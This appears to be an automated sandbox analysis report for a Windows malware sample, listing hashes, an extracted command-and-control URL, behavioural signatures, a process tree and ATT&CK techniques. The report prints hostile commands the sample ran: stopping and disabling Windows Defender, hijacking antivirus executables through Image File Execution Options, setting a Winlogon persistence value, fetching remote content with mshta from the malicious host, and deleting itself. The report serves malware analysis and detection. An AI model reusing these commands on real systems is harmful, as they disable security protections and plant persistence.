Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-09-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe
-
Size
1.6MB
-
MD5
e0a772e3e650391ab54c92c61881493b
-
SHA1
5e1bd9db61a3b240808f7712a67dc2e82648d281
-
SHA256
d878785bc3ca5d1436afbee19bf8e015d52806c22cc15906b8222ca69cf2912f
-
SHA512
03ad7ff09e4208f58e57fe1f94d0869024e13497fbd4194f6c888f7ada78254e0ea8baf079e4c0ce7bfdbb6ab70bc2b721ba9712465ced5beb81a191dc27a6df
-
SSDEEP
49152:kfPq9jchRQzGOJmkx8lxca5CTcOU7m6kE5N:2Po4ESOJmk8rc1AOU7kQ
Malware Config
Extracted
http://daa2265a99d3e63e.pc-shieldonline.com/favicon.ico?0=106&1=0&2=1&3=102&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=mnlllpiqaq
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\gntknvi.exe" gntknvi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" gntknvi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe gntknvi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" gntknvi.exe -
Deletes itself 1 IoCs
pid Process 2752 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2824 gntknvi.exe -
Loads dropped DLL 2 IoCs
pid Process 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2804 sc.exe 2784 sc.exe 2868 sc.exe 2884 sc.exe 1576 sc.exe 756 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gntknvi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2824 gntknvi.exe Token: SeShutdownPrivilege 2824 gntknvi.exe Token: SeDebugPrivilege 2824 gntknvi.exe Token: SeShutdownPrivilege 2824 gntknvi.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe 2824 gntknvi.exe -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 2304 wrote to memory of 1576 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 30 PID 2304 wrote to memory of 1576 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 30 PID 2304 wrote to memory of 1576 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 30 PID 2304 wrote to memory of 1576 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 30 PID 2304 wrote to memory of 756 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 31 PID 2304 wrote to memory of 756 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 31 PID 2304 wrote to memory of 756 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 31 PID 2304 wrote to memory of 756 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 31 PID 2304 wrote to memory of 2052 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 32 PID 2304 wrote to memory of 2052 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 32 PID 2304 wrote to memory of 2052 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 32 PID 2304 wrote to memory of 2052 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 32 PID 2304 wrote to memory of 2804 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 33 PID 2304 wrote to memory of 2804 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 33 PID 2304 wrote to memory of 2804 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 33 PID 2304 wrote to memory of 2804 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 33 PID 2304 wrote to memory of 2824 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 38 PID 2304 wrote to memory of 2824 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 38 PID 2304 wrote to memory of 2824 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 38 PID 2304 wrote to memory of 2824 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 38 PID 2304 wrote to memory of 2752 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 39 PID 2304 wrote to memory of 2752 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 39 PID 2304 wrote to memory of 2752 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 39 PID 2304 wrote to memory of 2752 2304 e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe 39 PID 2052 wrote to memory of 2916 2052 net.exe 40 PID 2052 wrote to memory of 2916 2052 net.exe 40 PID 2052 wrote to memory of 2916 2052 net.exe 40 PID 2052 wrote to memory of 2916 2052 net.exe 40 PID 2824 wrote to memory of 2884 2824 gntknvi.exe 42 PID 2824 wrote to memory of 2884 2824 gntknvi.exe 42 PID 2824 wrote to memory of 2884 2824 gntknvi.exe 42 PID 2824 wrote to memory of 2884 2824 gntknvi.exe 42 PID 2824 wrote to memory of 2868 2824 gntknvi.exe 43 PID 2824 wrote to memory of 2868 2824 gntknvi.exe 43 PID 2824 wrote to memory of 2868 2824 gntknvi.exe 43 PID 2824 wrote to memory of 2868 2824 gntknvi.exe 43 PID 2824 wrote to memory of 1964 2824 gntknvi.exe 44 PID 2824 wrote to memory of 1964 2824 gntknvi.exe 44 PID 2824 wrote to memory of 1964 2824 gntknvi.exe 44 PID 2824 wrote to memory of 1964 2824 gntknvi.exe 44 PID 2824 wrote to memory of 2784 2824 gntknvi.exe 45 PID 2824 wrote to memory of 2784 2824 gntknvi.exe 45 PID 2824 wrote to memory of 2784 2824 gntknvi.exe 45 PID 2824 wrote to memory of 2784 2824 gntknvi.exe 45 PID 1964 wrote to memory of 2664 1964 net.exe 50 PID 1964 wrote to memory of 2664 1964 net.exe 50 PID 1964 wrote to memory of 2664 1964 net.exe 50 PID 1964 wrote to memory of 2664 1964 net.exe 50 PID 2824 wrote to memory of 1932 2824 gntknvi.exe 51 PID 2824 wrote to memory of 1932 2824 gntknvi.exe 51 PID 2824 wrote to memory of 1932 2824 gntknvi.exe 51 PID 2824 wrote to memory of 1932 2824 gntknvi.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e0a772e3e650391ab54c92c61881493b_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1576
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:2916
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2804
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\gntknvi.exeC:\Users\Admin\AppData\Roaming\Microsoft\gntknvi.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2884
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2868
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:2664
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://daa2265a99d3e63e.pc-shieldonline.com/favicon.ico?0=106&1=0&2=1&3=102&4=i-s&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=mnlllpiqaq"3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\E0A772~1.EXE" >> NUL2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2752
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD5e0a772e3e650391ab54c92c61881493b
SHA15e1bd9db61a3b240808f7712a67dc2e82648d281
SHA256d878785bc3ca5d1436afbee19bf8e015d52806c22cc15906b8222ca69cf2912f
SHA51203ad7ff09e4208f58e57fe1f94d0869024e13497fbd4194f6c888f7ada78254e0ea8baf079e4c0ce7bfdbb6ab70bc2b721ba9712465ced5beb81a191dc27a6df